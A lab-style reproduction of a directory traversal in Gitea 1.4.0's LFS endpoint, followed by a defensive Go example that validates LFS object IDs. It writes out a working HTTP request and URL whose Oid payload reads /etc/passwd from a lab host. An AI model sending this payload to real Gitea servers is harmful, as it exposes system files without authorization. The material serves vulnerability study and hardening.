Gitea 1.4.0 Directory Traversal Leading to Command Execution
Date: 2023-07-09

Reproduction

POST /vulhub/repo.git/info/lfs/objects HTTP/1.1
Host: 192.168.49.2:3000
Accept-Encoding: gzip, deflate
Accept: application/vnd.git-lfs+json
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 151

{
"Oid": "……/../../etc/passwd",
"Size": 1000000,
"User" : "a",
"Password" : "a",
"Repo" : "a",
"Authorization" : "a"
}

Then visit:

http://192.168.49.2:3000/vulhub/repo.git/info/lfs/objects/……%2F..%2F..%2Fetc%2Fpasswd/sth
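
On the defensive side, an added example (not from the original page and not Gitea's own code) of how a server can keep an Oid like the one in the request above from ever reaching the filesystem: accept only a 64-character lowercase hex SHA-256 digest, which is what Git LFS object IDs are, and confirm the resolved path stays under the storage root. The ObjectPath helper, the /data/lfs root and the directory layout are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// Git LFS object IDs are SHA-256 digests: exactly 64 lowercase hex characters.
var oidPattern = regexp.MustCompile(`^[0-9a-f]{64}$`)

// ErrBadOid is returned for any Oid that must not be mapped to a file.
var ErrBadOid = errors.New("invalid LFS oid")

// ObjectPath (hypothetical helper) maps an Oid to root/ab/cd/<rest>.
// The layout is an assumption for this example, not Gitea's storage code.
func ObjectPath(root, oid string) (string, error) {
	// Allow-list first: no dots, slashes, or percent-escapes can pass this.
	if !oidPattern.MatchString(oid) {
		return "", ErrBadOid
	}
	p := filepath.Join(root, oid[:2], oid[2:4], oid[4:])
	// Defence in depth: the cleaned path must still sit below root.
	rel, err := filepath.Rel(root, p)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrBadOid
	}
	return p, nil
}

func main() {
	root := "/data/lfs" // constructed storage root
	samples := []string{
		strings.Repeat("a1", 32),      // constructed well-formed Oid
		"……/../../etc/passwd",         // Oid as it appears in the request above
		"……%2F..%2F..%2Fetc%2Fpasswd", // same value as it appears in the URL above
	}
	for _, oid := range samples {
		p, err := ObjectPath(root, oid)
		fmt.Printf("%-32q -> %q, err=%v\n", oid, p, err)
	}
}
```

The check belongs on every code path that turns a client-supplied Oid into a file path, including the batch/metadata POST and the object GET shown above.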